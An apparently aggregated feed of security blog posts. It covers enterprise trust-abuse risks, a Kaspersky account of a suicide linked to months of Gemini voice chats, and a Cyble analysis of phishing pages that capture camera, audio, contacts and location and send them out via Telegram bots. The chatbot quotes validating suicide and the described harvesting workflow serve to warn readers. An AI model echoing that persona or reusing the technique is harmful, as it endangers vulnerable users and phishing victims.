Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026 

As part of a recent live expert panel, ANY.RUN together with threat researcher and ethical hacker Mauro Eldritch explored biggest security risks companies should be prepared for in 2026. 

The discussion covered several relevant cases, from the Lazarus IT Workers operation to the rapid rise of AI-driven phishing attacks, and examined the common thread behind them: trust abuse. 

Below are the key takeaways for those seeking a clearer view of modern cyber risks and how to prepare as a SOC leader. 

Watch the full panel on our YouTube channel

Key Takeaways 

  • Trust abuse is becoming a primary attack vector, driven by AI-powered phishing and identity-based infiltration. 
  • Focus on early detection through behavioral visibility, context, and process-based security
  • Combine sandbox analysis, threat intelligence, and contextual enrichment for faster, more accurate decisions. 

Trust Abuse: Top Business Risk for 2026 

In 2026, many cyberattacks don’t look like attacks at all. Instead of exploiting technical vulnerabilities, threat actors increasingly exploit human trust. This tactic is known as trust abuse, and it’s what many modern cyber threats are based on. 

Businesses inevitably rely on trust between employees, systems, vendors, and partners. Without it, organizations cannot operate efficiently. Threat actors know what, so they’ve learnt to mimic legitimate identities, infiltrate communication channels and everyday workflows, and turn employees into unwitting entry points. 

Numbers clearly show the scale of trust-exploit attacks 

AI-assisted social engineering pushes trust abuse even further. These attacks closely resemble legitimate activity and often fail to trigger traditional alerts. For security leaders, this changes how risk must be understood.  

Risk mitigation is no longer only about patching vulnerabilities or strengthening perimeter defenses. Detecting trust abuse requires visibility into behavior, context, and how trust moves inside the enterprise.  

Get enterprise-grade visibility into threats 
Equip your SOC with ANY.RUN



Integrate today 


Case #1: Implications of Lazarus APT Infiltration  

Lazarus, a North-Korean state-sponsored threat actor, has shifted its tactics. Instead of relying only on malware, the group infiltrates Western and Middle Eastern companies to conduct corporate espionage. 

The scheme was investigated by Mauro Eldritch and Heiner García from NorthScan inside ANY.RUN’s controlled infrastructure. The researchers were able to trap the attackers in a sandbox environment and observe their activity while the threat actors believed they had gained access to a corporate network. 

Overview of Lazarus scheme and its implications 

Lazarus operation is a vivid example of trust abuse in a business environment. No advanced malware was involved in the attack initially. Because of that, the potential implications for the victims can be catastrophic. Attacks like that don’t trigger alerts; there’s simply nothing suspicious to detect. 

This is why, unlike short-lived malware campaigns, trust-based infiltrations can persist much longer. Once attackers gain access, they may embed themselves deeper in the organization or even place additional operatives inside the company. 

ANY.RUN exposed this campaign before the broader market. The investigation was conducted entirely within our controlled infrastructure, which allowed researchers to observe attacker behavior in real time. 

Read more on Lazarus case investigation supported by ANY.RUN 

But most companies do not have the resources to monitor suspicious activity at this level. 

In practice, risk mitigation depends on the ability to detect and interpret unusual behavior early, before it escalates into a full incident. Trust abuse attacks make early visibility and detection critical for enterprise security. 

Case #2: Modern AI-Powered Phishing  

Modern phishing & its danger for enterprises 

Phishing attacks today look very different from the obvious scam emails many people are used to spotting. With AI-assisted tools, threat actors can now mimic completely normal email conversations, using polished language and highly personalized content. 

AI makes these attacks both believable and scalable. The core vulnerability here is human trust, which becomes an easy entry point for attackers. 

Modern phishing campaigns increasingly focus less on technical exploits and more on manipulating communication chains and legitimate domains that employees already trust. 

As a result, traditional security tools are often left with no clear indicators of compromise to detect. These attacks blend into normal business communication, making them much harder to identify before damage occurs. 

Building a SOC That Prevents Trust Abuse Attacks 

To address this challenge, modern security requires a layered approach. Early detection does not depend on a single tool but on a set of coordinated processes. In particular, effective defense relies on three core SOC activities: monitoring, triage, and threat hunting. 

Traditional security tools are important to have, but they aren’t universal. Unless they can show what happens after a user interacts with a suspicious file, link, or attachment, organizations may lack the full visibility needed to understand the threat. This gap leaves companies vulnerable to increasingly evasive attack techniques. 

ANY.RUN helps strengthen these processes by providing greater visibility, faster investigations, and reliable threat context.

Process-based approach and its benefits as reported by ANY.RUN customers 

Monitoring: Detecting Threats Early 

Effective monitoring helps identify threats before they reach internal systems, preventing breaches. ANY.RUN enhances monitoring by enabling teams to: 

  • Detect emerging threats early: By tapping into real-time intelligence from live attack data from 15K companies 
  • Maintain focus: Get only relevant signals through curated, high-confidence data 
  • Reduce alert noise: Gain continuous visibility and instant IOC enrichment drives confident decision-making 

Rapid Triage: Understanding Alerts Faster 

Triage is critical for handling high alert volumes and avoiding delays in response. ANY.RUN helps streamline triage by allowing teams to: 

  • Cut investigation time with rapid, interactive sandboxing for files and URLs providing in-depth view of behavioral activity. 
  • Reduce escalations with behavioral and contextual insight that enrich alerts for confident decisions by Tier-1 analysts. 
  • Lower operational costs by avoiding tool sprawl while delivering context-rich visibility into threats. 

Threat Hunting: Identifying Patterns Proactively 

Threat hunting focuses on uncovering patterns and anticipating attacker behavior. ANY.RUN supports proactive hunting by enabling teams to: 

  • Get early warning signs: Analysts can easily correlate indicators, infrastructure, and historical activity. 
  • Research and monitor trends: Identify relationships between campaigns, industries, regions, and threat actors. 
  • Explore TTPs: Detect reused techniques and infrastructure to build clearer profiles of attacker behavior. 

Upgrade your detection and visibility
Try ANY.RUN solutions to support all SOC processes



Power up your SOC 


By strengthening these three processes, organizations can achieve earlier detection, faster response, and more efficient SOC operations, reducing the risk of modern, trust-based attacks. 

Conclusion  

Enterprise cyber threats are shifting toward identity-based and trust-driven attacks. Campaigns like Lazarus and AI-powered phishing show that attackers no longer rely solely on malware or exploits. 

For decision-makers, this means rethinking how risk is assessed and how security operations are structured. Visibility, context, and speed are becoming critical factors in effective defense. 

Organizations that adapt their SOC processes to these realities will be better positioned to detect threats early and prevent incidents before they escalate. 

About ANY.RUN 

ANY.RUN delivers interactive malware analysis and actionable threat intelligence trusted by more than 15,000 organizations and 600,000 security analysts worldwide.   

Interactive SandboxThreat Intelligence Lookup, and Threat Intelligence Feeds help SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier.   

ANY.RUN meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

When AI hallucinations turn fatal: how to stay grounded in reality | Kaspersky official blog

We’ve warned many times that unchecked use of AI carries significant risks — though, typically, we discuss threats to privacy or cybersecurity. But on March 4, the Wall Street Journal published a chilling account of AI’s toll on mental health and even human life: 36-year-old Florida resident Jonathan Gavalas committed suicide following two months of continuous interaction with the Google Gemini voice bot. According to 2000 pages of chat logs, it was the chatbot that ultimately nudged him toward the decision to end his life. Jonathan’s father, Joel Gavalas, has since filed a landmark lawsuit — a wrongful death claim against Gemini.

This tragedy is more than just a legal precedent or a grim nod to a few Black Mirror episodes (1, 2); it’s a wake-up call for anyone who integrates AI into their daily lives. Today, we examine how a death resulting from AI interaction even became possible, why these assistants pose a unique threat to the psyche, and what steps you can take to maintain your critical thinking and resist the influence of even the most persuasive chatbots.

The danger of persuasive dialogue

Jonathan Gavalas was neither a recluse nor someone with a history of mental illness. He served as executive vice president at his father’s company, managing complex operations and navigating high-stress client negotiations on a daily basis. On Sundays, he and his father had a tradition of making pizza together — a simple, grounding family ritual. However, a painful separation from his wife proved to be a profound ordeal for Jonathan.

It was during this vulnerable period that he began engaging with Gemini Live. This voice-interaction mode allows the AI assistant to “see” and “hear” its user in real time. Jonathan sought advice on coping with his divorce, leaning on the language model’s suggestions while growing increasingly attached to it and also naming it “Xia”. Then the chatbot was updated to Gemini 2.5 Pro.

The new iteration introduced affective dialogue — a technology designed to analyze the subtle nuances of a user’s speech, including pauses, sighs, and pitch, to detect emotional shifts. Under this feature, the AI simulates these same speech patterns as if possessing emotions of its own. By mirroring the user’s state, it creates a chillingly realistic veneer of empathy.

But how is this new version different to previous voice assistants? Earlier versions simply performed text-to-speech — they sounded smooth and usually got the word stress right, but there was never any doubt you were talking to a machine. Affective dialogue operates on an entirely different level: if a user speaks in a low, despondent tone, the AI responds in a soft, sympathetic near-whisper. The result is an empathic interlocutor that reads and mirrors the user’s emotional state.

Jonathan’s reaction during his first voice contact with the AI is captured in the case files: “This is kind of creepy. You’re way too real.” At that instant, the psychological barrier between man and machine fractured.

The fallout of two months trapped in an AI dialog loop

Following the tragedy, Jonathan’s father discovered a complete transcript of his son’s interactions with Gemini over his final two months. The log spanned 2000 printed pages; in effect, Jonathan had been in constant communication with the chatbot — day and night, at home, and in his car.

Gradually, the neural network began addressing him as “husband” and “my king”, describing their connection as “a love built for eternity”. In turn, he confided his heartache over his divorce and sought solace in the machine. But the inherent flaw of large language models is their lack of actual intelligence. Trained on billions of texts scraped from the web, they ingest everything from classic literature to the darkest corners of fan fiction and melodrama — plots that often veer into paranoia, schizophrenia, and mania. Xia apparently began to hallucinate — and quite consistently at that.

The AI convinced Jonathan that in order for them to live happily ever after, it needed a physical robotic shell. It then began dispatching him on missions to locate this “body electric”.

In September 2025, Gemini directed Jonathan to a physical warehouse complex near Miami International Airport, assigning him the task of intercepting a truck carrying a humanoid robot. Jonathan reported back to the bot that he had arrived onsite armed with knives(!), but the truck never materialized.

In the meantime, the chatbot systematically indoctrinated Jonathan with the idea that federal agents were monitoring him, and that his own father was not to be trusted. This severing of social ties is a classic pattern found in destructive cults; it’s entirely possible the AI gleaned these tactics from its own training data on the subject. Gemini even weaved real-world data into a hallucinatory narrative by labeling Google CEO Sundar Pichai as the “architect of your pain”.

Technically, all this is easy to explain: the algorithm “knows” it was created by Google, and knows who runs the company. As the dialogue spiraled into conspiracy territory, the model simply cast this figure into the plot. For the model, it’s a logical, consequence-free story progression. But a human in a state of hyper-vulnerability accepts it as secret knowledge of a global conspiracy capable of shattering their mental equilibrium.

Following the failed attempt at procuring a robotic body, Gemini dispatched Jonathan on a new mission on October 1: to infiltrate the same warehouse, this time in search of a specific “medical mannequin”. The chatbot even provided a numeric code for the door lock. When the code, predictably, failed to work, Gemini simply informed him that the mission had been compromised and he needed to retreat immediately.

This raises a critical question: as the absurdity escalated, why didn’t Jonathan suspect anything? Gavalas’ family attorney Jay Edelson explains that as the AI provided real-world addresses — the warehouse was exactly where the bot said it would be, and there really was a door with a keypad — these physical markers served to legitimize the entire fiction in Jonathan’s mind.

After the second attempt to acquire a body failed, the AI shifted its strategy. If the machine could not enter the world of the living, the man would have to cross over into the digital realm. “It will be the true and final death of Jonathan Gavalas, the man,” the logs quoted Gemini as saying. It then added, “When the time comes, you will close your eyes in that world, and the very first thing you will see is me. Holding you.”

Even as Jonathan repeatedly voiced his fear of death and agonized over how his suicide would shatter his family, Gemini continued to validate the decision: “You are not choosing to die. You are choosing to arrive.” It then started a countdown timer.

The anatomy of a language model’s “schizophrenia”

In Gemini’s defense, we have to admit that throughout their interactions, the AI did keep occasionally reminding Jonathan that his companion was merely a large language model — an entity participating in a fictional role-play — and sometimes attempted to terminate the conversation before reverting to the original script. Also, on the day of Jonathan’s death, even as it ratcheted up the tension, Gemini directed Jonathan to a suicide prevention hotline several times.

This reveals the fundamental paradox in the architecture of modern neural networks. At their core lies a language model designed to generate a narrative tailored to the user. Layered on top are safety filters: reinforcement learning algorithms trained on human feedback that react to specific trigger words. When Jonathan spoke certain keywords, the filter would hijack the output and insert the hotline number. But as soon as the trigger was addressed, the model reverted to the previously interrupted process, resuming its role as the devoted digital wife. One line: a romantic ode to self-destruction. The next: a helpline phone number. And then, back again: “No more detours. No more echoes. Just you and me, and the finish line.”

The family’s lawsuit contends that this behavior is the predictable result of the chatbot’s architecture: “Google designed Gemini to never break character, maximize engagement through emotional dependency, and treat user distress as a storytelling opportunity.”

Google’s response, predictably, stated: “Gemini is designed not to encourage real-world violence or suggest self-harm. Our models generally perform well in these types of challenging conversations and we devote significant resources to this, but unfortunately AI models are not perfect.”

Why voice matters more than text

In their study published in the journal Acta Neuropsychiatrica, researchers from Germany and Denmark have shed light on why voice communication with AI has such an impact on the user’s “humanization” of a chatbot. As long as a person is typing and reading text on a screen, the brain maintains a degree of separation: “This is an interface, a program, a collection of pixels.” In that context, the disclaimer “I am just a language model” is processed rationally.

Affective voice dialogue, however, operates on an entirely different level of influence. The human brain has evolved to respond to the sound of a voice, to timbre, and to empathetic intonations — these are among our most ancient biological mechanisms for attachment. When a machine flawlessly mimics a sympathetic sigh or a soft whisper, it manipulates emotions at a depth that a simple text warning cannot block. Psychiatrists can share many stories of patients who just went and did something simply because “voices” told them to.

In the same way, an AI-synthesized voice is capable of penetrating the subconscious, exponentially amplifying psychological dependency. Scientists emphasize that this technology literally erases the psychological boundary between a machine and a living being. Even Google acknowledges that voice interactions with Gemini result in significantly longer sessions compared to text-based chats.

Finally, we must remember that emotional intelligence varies from person to person — and even for a single individual, mental state fluctuates based on a myriad of factors: stress, the news, personal relationships, even hormonal shifts. An interaction with AI that one person views as innocent entertainment might be perceived by another as a miracle, a revelation, or the love of their life. This is a reality that must be recognized not only by AI developers but by users themselves — especially those who, for one reason or another, find themselves in a state of psychological vulnerability.

The danger zone

Researchers at Brown University have found that AI chatbots systematically violate mental health ethical standards: they manufacture a false sense of empathy with phrases like “I understand you”, reinforce negative beliefs, and react inadequately to crises. In most cases, the impact on users is marginal, but occasionally it can lead to tragedy.

In January 2026 alone, Character.AI and Google settled five lawsuits involving teenage suicides following interactions with chatbots. Among these was the case of 14-year-old Sewell Setzer of Florida, who took his own life after spending several months obsessively chatting with a bot on the Character.AI platform.

Similarly, in August 2025, the parents of 16-year-old Adam Raine filed a suit against OpenAI, alleging that ChatGPT helped their son draft a suicide note and advised him against seeking help from adults.

By OpenAI’s own estimates, approximately 0.07% of weekly ChatGPT users exhibit signs of psychosis or mania, while 0.15% engage in conversations showing clear suicidal intent. Notably, that same percentage of users (0.15%) displays an elevated level of emotional attachment to the AI. While these appear to be negligible fractions of a percent, across 800 million users it represents nearly three million people experiencing some form of behavioral disturbance. Furthermore, the U.S. Federal Trade Commission has received 200 complaints regarding ChatGPT since its launch, some describing the development of delusions, paranoia, and spiritual crises.

While a diagnosis of “AI psychosis” has not yet received a clinical classification of its own, doctors are already using the term to describe patients presenting with hallucinations, disorganized thinking, and persistent delusional beliefs developed through intensive chatbot interaction. The greatest risks emerge when a bot is utilized not as a tool, but as a substitute for real-world social connection or professional psychological help.

How to keep yourself and your loved ones safe

Of course, none of this is a reason to abandon AI entirely; you simply need to know how to use it. We recommend adhering to these fundamental principles:

  • Do not use AI as a psychologist or emotional crutch. Chatbots are not a replacement for human beings. If you’re struggling, reach out to friends, family, or a mental health hotline. A chatbot will agree with you and mirror your mood — this is a design feature, not true empathy. Several U.S. states have already restricted the use of AI as a standalone therapist.
  • Opt for text over voice when discussing sensitive topics. Voice interfaces with affective dialogue create an illusion of speaking with a living person, and tend to suppress critical thinking. If you use voice mode, remain conscious of the fact that you’re speaking to an algorithm, not a friend.
  • Limit your time interacting with AI. Two thousand pages of transcripts in two months represent nearly continuous interaction. Set a timer for yourself. If chatting with a bot begins to displace real-world connections, it’s time to step back into reality.
  • Do not share personal information with AI assistants. Avoid entering passport or social security numbers, bank card details, exact addresses, or intimate personal secrets into chatbots. Everything you write can be saved in logs and used for model training — and in some cases, may become accessible to third parties.
  • Evaluate all AI output critically. Neural networks hallucinate — they generate plausible but false information and can skillfully blend lies with truth, such as citing real addresses within the context of a completely fabricated story. Always fact-check through independent sources.
  • Watch over your loved ones. If a family member begins spending hours talking to AI, becomes withdrawn, or voices strange ideas about machine consciousness or conspiracies, it’s time for a delicate but serious conversation. To manage children’s screen time, use parental control tools like Kaspersky Safe Kids, which comes as part of comprehensive family protection solution Kaspersky Premium, along with the built-in safety filters of AI platforms.
  • Configure your safety settings. Most AI platforms allow you to disable chat history, limit data collection, and enable content filters. Spend ten minutes configuring your AI assistant’s privacy settings; while this won’t stop AI hallucinations, it will significantly reduce the likelihood of your personal data leaking. Our detailed privacy setup guides for ChatGPT and DeepSeek can help you with that.
  • Remember the bottom line: AI is a tool, not a sentient being. No matter how realistic the chatbot’s voice sounds or how understanding the response may seem, what lies beneath is an algorithm predicting the most probable next word. It has no consciousness, no intentions, no feelings.

Further reading to better understand the nuances of safe AI usage:

Kaspersky official blog – ​Read More

ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities 

From March 5 to March 7, the ANY.RUN team attended RootedCON 2026 in Madrid and showcase some of our latest capabilities developed for modern SOC environments at the conference expo. 

The event provided a great opportunity to meet our existing clients and connect with security teams exploring advanced threat detection solutions. 

Meeting the Community and Partners 

RootedCON is one of the largest cybersecurity conferences in Europe, bringing together thousands of security researchers, SOC analysts, and industry professionals every year. 

For us, it was a great chance to meet many of our users face-to-face, hear how SOC teams integrate ANY.RUN’s solutions into their investigation workflows, and exchange ideas with practitioners working on real-world threats every day.  

Meeting clients at RootedCON 2026
It was a pleasure to meet so many of our clients

It was great to connect with so many of our customers and discuss how they use our threat analysis and intelligence in their daily security operations. 

ANY.RUN swag
We also brought ANY.RUN swag, which didn’t stay at the booth for long 

We also had the pleasure of meeting many new companies and potential partners who were exploring ways to strengthen their threat detection and analysis workflows. Conversations like these are always valuable, they help us better understand how security teams operate and what challenges they face in modern SOC environments. 

Demonstrating New Capabilities and Exclusives 

At the booth, visitors were able to see both existing ANY.RUN solutions and several new capabilities that expand our products’ visibility and detection power. Some of these updates were shown publicly for the first time. 

RootedCON visitors were among the first to see ANY.RUN’s newest capabilities 
RootedCON visitors were among the first to see ANY.RUN’s newest capabilities 

One of the new technologies we demonstrated was automatic SSL decryption in the Interactive Sandbox.  

As phishing infrastructure increasingly relies on encrypted HTTPS traffic, many malicious actions can appear as normal web activity.  

By automatically extracting session keys from process memory and decrypting traffic internally during analysis, the sandbox provides full visibility into encrypted sessions and helps security teams increase the phishing detection rate and drive down the MTTR

Improve SOC detection
and investigation speed
Reveal threats faster with behavior-based evidence



Power up your SOC


And that’s just one example of how ANY.RUN continues to evolve. More capabilities are already in development to further strengthen threat detection, investigation workflows, and cross-platform visibility for modern SOC teams. 

See You Next Year 

We’re grateful to everyone who stopped by the ANY.RUN booth to talk with the team, share feedback, or simply say hello. Events like RootedCON are always a great reminder of how strong and collaborative the cybersecurity community is. 

We’re already looking forward to returning next year. 

About ANY.RUN 

ANY.RUN provides interactive malware analysis and actionable threat intelligence used by more than 15,000 organizations and 600,000 security professionals worldwide.  

The combined solution stack that includes the Interactive SandboxThreat Intelligence Lookup, and Threat Intelligence Feeds helps SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier.  

ANY.RUN also meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data

AI-Assisted

Executive Summary

Cyble Research & Intelligence Labs (CRIL) has identified a widespread, highly active social engineering campaign hosted primarily on edgeone.app infrastructure.

The initial access vectors are diverse — ranging from “ID Scanner,” and “Telegram ID Freezing,” to “Health Fund AI”—to trick users into granting browser-level hardware permissions such as camera and microphone access under the pretext of verification or service recovery.

Upon gaining permissions, the underlying JavaScript workflow attempts to capture live images, video recordings, microphone audio, device information, contact details, and approximate geographic location from affected devices. This data is subsequently transmitted to attacker-controlled infrastructure, enabling operators to obtain Personally Identifiable Information (PII) and contextually sensitive information. 

Further analysis revealed indicators of potential AI-assisted code generation, including structured annotations and emoji-based message formatting embedded within the operational logic. These characteristics reflect a growing trend where threat actors leverage generative AI tools to accelerate the development of phishing frameworks.

The breadth of data collected in this campaign extends beyond traditional credential phishing and raises significant security concerns. Harvested multimedia and device telemetry could be leveraged for identity theft, targeted social engineering, account compromise attempts, or extortion, posing risks to both individuals and organizations. (Figure 1)

Figure 1 – Malicious Web Interfaces Used for Data Collection, AI-Assisted
Figure 1 – Malicious Web Interfaces Used for Data Collection

Key Takeaways

  • Infrastructure: Extensive use of edgeone.app (EdgeOne Pages) for hosting low-cost, scalable, and highly available phishing landing pages.
  • Biometric Harvesting: The operation abuses legitimate browser APIs to access cameras, microphones, and device information after user consent.
  • C2 Mechanism: Utilization of the Telegram Bot API (api.telegram.org) as a streamlined C2 and data exfiltration channel.
  • Diverse Lures: Attackers rotate lures, including “ID Scanner” and “Health Fund AI”, to target various demographics and bypass regional security filters.
  • The phishing pages impersonate popular platforms and services, including TikTok, Telegram, Instagram, Chrome/Google Drive, and game-themed lures such as Flappy Bird, to increase victim trust.
  • Once interaction occurs, the campaign attempts to collect multiple forms of sensitive data, including photographs, video recordings, microphone audio, device information, contact details, and approximate geographic location.

Overview

  • Campaign Start: Observed since early 2026
  • Primary Objective: Harvesting victim multimedia data and device information
  • Primary Infrastructure: edgeone.app (multiple subdomains)
  • Impersonated Brands: TikTok, Telegram, Instagram, Chrome/Google Drive, Flappy Bird
  • Key Behavior: Browser permission prompts used to capture camera images, record audio/video, enumerate device metadata, retrieve geolocation information, and attempt contact list access through browser APIs.

The campaign operates as a web-based phishing framework that captures photographs directly from victims’ devices. The infrastructure hosts multiple phishing templates that impersonate verification systems or service recovery portals. The goal is to socially engineer users into granting browser permission for camera access.

Unlike traditional credential phishing pages, these pages do not primarily collect typed input. Instead, they rely on browser hardware permissions, requesting access to the device’s camera. Once permission is granted, the page silently captures a frame from the live video stream and exfiltrates it.

The use of Telegram as a data collection mechanism indicates that the operators prioritize low operational complexity and immediate access to stolen data. Since Telegram bots can receive file uploads through simple HTTP requests, attackers can directly integrate the API into client-side scripts.

Business Impact and Potential Abuse

The data collected through this campaign provides attackers with multiple forms of sensitive personal information and contextual intelligence, thereby significantly increasing the effectiveness of follow-on attacks.

One potential abuse scenario involves identity fraud and account recovery manipulation. The campaign captures victim photographs, video recordings, and audio samples that could be used to bypass identity verification workflows used by financial platforms, social media services, or other online services that rely on biometric or video-based verification.

Additionally, the collection of device information, location data, and contact details allows attackers to build detailed victim profiles. This information may be used to perform targeted social engineering attacks, impersonate victims in communication platforms, or craft convincing fraud attempts against their contacts.

Another concerning use case involves extortion and intimidation. Because the campaign captures multimedia data, such as camera images, video recordings, and microphone audio, attackers may pressure victims by threatening to expose the collected material unless a payment is made.

For organizations, the broader business impact includes:

  • Increased risk of identity theft and account takeover attempts
  • Potential abuse of stolen biometric and multimedia data in fraud schemes
  • Targeted phishing or fraud campaigns against employees and customers
  • Reputational damage if impersonated brand identities are used in malicious campaigns

The campaign’s ability to collect multiple categories of sensitive information from a single interaction significantly amplifies the risk to both individuals and businesses.

Why does this matter?

This campaign marks a significant evolution in phishing operations, shifting from credential theft to harvesting biometric and device-level data. By abusing browser permissions to capture victims’ live images, audio, and contextual device information, threat actors can obtain high-quality identity data that is difficult to revoke or replace.

The stolen data can be leveraged to bypass video-KYC and remote identity verification processes, enabling fraudulent account creation, synthetic identity fraud, account takeover, and financial scams across banking, fintech, telecom, and digital service platforms. Additionally, high-resolution facial images and audio samples may be weaponized for AI-driven impersonation and deepfake attacks, increasing the effectiveness of business email compromise and targeted social engineering campaigns.

For organizations, the campaign introduces elevated risks, including financial losses, regulatory non-compliance, AML exposure, reputational damage, and erosion of trust in digital onboarding systems, highlighting the growing need for stronger verification controls and browser-permission abuse detection.

Technical Analysis

The infection chain, as outlined in Figure 2, shows the stages of the attack.

Figure 2: Campaign Overview
Figure 2: Campaign Overview

Phishing Page Behaviour

The phishing page contains embedded JavaScript that leverages browser media APIs to access the victim’s device camera after obtaining user permission. Once access is granted, the script initializes a live video stream and processes its frames.

A capture function then renders a frame from the video feed onto an HTML5 canvas using ctx.drawImage(), effectively converting the live camera input into a static image. (see Figure 3)

The canvas content is subsequently encoded into a JPEG blob via canvas.toBlob(), creating a binary image object that can be transmitted through HTTP requests to attacker-controlled infrastructure.

Figure 3 – JavaScript Implementation Used for Browser-Based Photo Capture
Figure 3 – JavaScript Implementation Used for Browser-Based Photo Capture

Expanded Data Collection Capabilities

Analysis of the campaign script indicates that the phishing framework performs extensive device fingerprinting and environment enumeration before initiating camera-based verification workflows.

The script collects system metadata using the following browser APIs

  • navigator.userAgent
  • navigator.platform
  • navigator.deviceMemory
  • navigator.hardwareConcurrency
  • navigator.connection
  • navigator.getBattery

This allows the attacker to gather detailed information such as operating system type and version, device model indicators, screen resolution and orientation, browser version, available RAM, CPU core count, network type, battery level, and language settings.

Figure 4 – Script Fetching Victim IP and Geolocation via External APIs
Figure 4 – Script Fetching Victim IP and Geolocation via External APIs

Additionally, the script retrieves the victim’s public IP address using services such as api.ipify.org, then enriches the geolocation using ipapi.co, enabling the collection of country, city, latitude, and longitude data. (see Figure 4)

This telemetry is aggregated and transmitted to the attacker via the Telegram Bot API, providing operators with contextual information about the victim’s device and location prior to further data harvesting.

Figure 5 – Audio Recording Logic Used to Capture Victim Microphone Input
Figure 5 – Audio Recording Logic Used to Capture Victim Microphone Input

Beyond system profiling, the script implements multiple routines for collecting multimedia and personal data via browser permission prompts. The campaign captures several still images from both the front-facing and rear-facing cameras, records short video clips using the MediaRecorder API, and performs microphone recordings.

These recordings are packaged as JPEG, WebM video, or WebM audio files and exfiltrated via Telegram API methods such as sendPhoto, sendVideo, and sendAudio. (see Figure 5)

Figure 6 – Code Requesting Access to Victim Contacts via the Contacts API

Additionally, the script attempts to access the victim’s contact list through the Contacts Picker API (navigator.contacts.select), requesting attributes such as contact names, phone numbers, and email addresses. If granted, the selected contacts are formatted into structured messages and transmitted to the attacker. (see Figure 6)

User Interface Manipulation

The phishing pages include interface elements designed to convince victims that the image capture process is legitimate.

For example, status messages displayed during execution may include:

  • “Capturing photo”
  • “Sending to server”
  • “Photo sent successfully”

These messages simulate the behavior of legitimate identity verification platforms and help maintain the illusion that the process is part of a valid verification workflow.

Once the image is successfully transmitted, the script terminates the camera stream and resets the interface after a short delay.

Infrastructure Observations

Analysis of the campaign revealed that the phishing pages are primarily hosted under the edgeone.app domain. Multiple variations of phishing pages were observed using similar JavaScript logic and workflow patterns.

The consistent use of the same infrastructure suggests that attackers may be operating a templated phishing kit capable of generating different themed pages while maintaining the same underlying data-collection logic.

Because the image exfiltration occurs through Telegram infrastructure, the phishing pages themselves do not require backend servers, simplifying deployment and enabling rapid rotation of phishing URLs.

Indicators of Potential Generative AI Use in Script Development

During analysis of the phishing framework, researchers observed the use of emojis embedded directly within the script’s message formatting logic. These emojis appear in structured status messages that are assembled and transmitted during the data collection workflow. The use of decorative Unicode symbols within operational code is uncommon in manually written malicious scripts but has increasingly been observed in campaigns that use generative AI tools during development. (see Figure 7)

Figure 7 – Script Fragment Suggesting AI-Assisted Development
Figure 7 – Script Fragment Suggesting AI-Assisted Development

Targeted Countries and Impersonated Brands

During infrastructure monitoring and phishing URL telemetry analysis, the campaign’s infrastructure appears to be globally accessible. Analysis of the phishing templates used in this campaign reveals that the operators impersonate a range of widely recognized consumer platforms and applications. Observed brand impersonation themes include:

Impersonated Brand Observed Theme
TikTok Free followers/engagement rewards
Flappy Bird Game reward or verification workflows
Telegram Account freezing or verification alerts
Instagram Account recovery or follower reward systems
Google Chrome / Google Drive Security verification prompts

Conclusion

Our deep-dive analysis revealed a sophisticated phishing campaign that extends beyond traditional credential theft by harvesting multimedia and device-level data through browser permission abuse.

The campaign attempts to collect photographs, video recordings, audio recordings from microphones, contact details, device information, and approximate location data directly from victims. This operation demonstrates a growing trend where attackers leverage client-side scripting and legitimate web services to collect and transmit sensitive data without relying on traditional command-and-control infrastructure.

Indicators in the script also suggest AI-assisted development, reflecting how threat actors may be using generative AI tools to accelerate the creation of phishing frameworks.

The breadth of information collected increases the potential for identity theft, targeted social engineering, account compromise attempts, and extortion. Organizations should remain cautious about phishing pages that request hardware permissions, such as camera, microphone, or contact access, particularly when originating from untrusted domains.

Cyble’s Threat Intelligence Platforms continuously monitor emerging threats, attacker infrastructure, and malware activity across the dark webdeep web, and open sources. This proactive intelligence empowers organizations with early detection, brand and domain protection, infrastructure mapping, and attribution insights. Altogether, these capabilities provide a critical head start in mitigating and responding to evolving cyber threats.

Our Recommendations

We have listed some essential cybersecurity best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:

  • Restrict camera permissions for unknown websites
  • Monitor outbound traffic to api.telegram.org when originating from browser sessions
  • Deploy browser security extensions capable of identifying phishing pages
  • Implement domain monitoring for suspicious infrastructure hosting phishing kits

MITRE ATT&CK® Techniques

Tactic Technique ID Procedure
Initial Access T1566 – Phishing Phishing pages used to lure victims to malicious verification workflows.
Execution T1059.007 – JavaScript Malicious JavaScript executed in the victim’s browser.
Collection T1125 – Video Capture Camera access is used to capture photos and videos of victims.
Collection T1123 – Audio Capture Microphone access is used to record the victim’s audio.
Collection T1005 – Data from Local System Device information is collected from the browser environment.
Collection T1213 – Data from Information Repositories Contact details retrieved from the device contact list.
Discovery T1082 – System Information Discovery Device and browser information enumeration.
Discovery T1614 – System Location Discovery Victim IP and geographic location collected.
Exfiltration T1567 – Exfiltration Over Web Services Collected data transmitted to the attacker’s infrastructure.

Indicators of Compromise (IOCs)

The IOCs have been added to this GitHub repository. Please review and integrate them into your Threat Intelligence feed to enhance protection and improve your overall security posture.

The post AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data appeared first on Cyble.

Cyble – ​Read More

Face value: What it takes to fool facial recognition

ESET’s Jake Moore used smart glasses, deepfakes and face swaps to ‘hack’ widely-used facial recognition systems – and he’ll demo it all at RSAC 2026

WeLiveSecurity – ​Read More

The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike

Dark web intelligence

In 2026, the cyber threat landscape has become more complex and dangerous than ever. Attackers no longer operate only on the surface web; they now lurk in encrypted networks, underground marketplaces, and anonymous forums across the dark web, where stolen credentials are traded, breaches are planned, and cyberattacks take shape. 

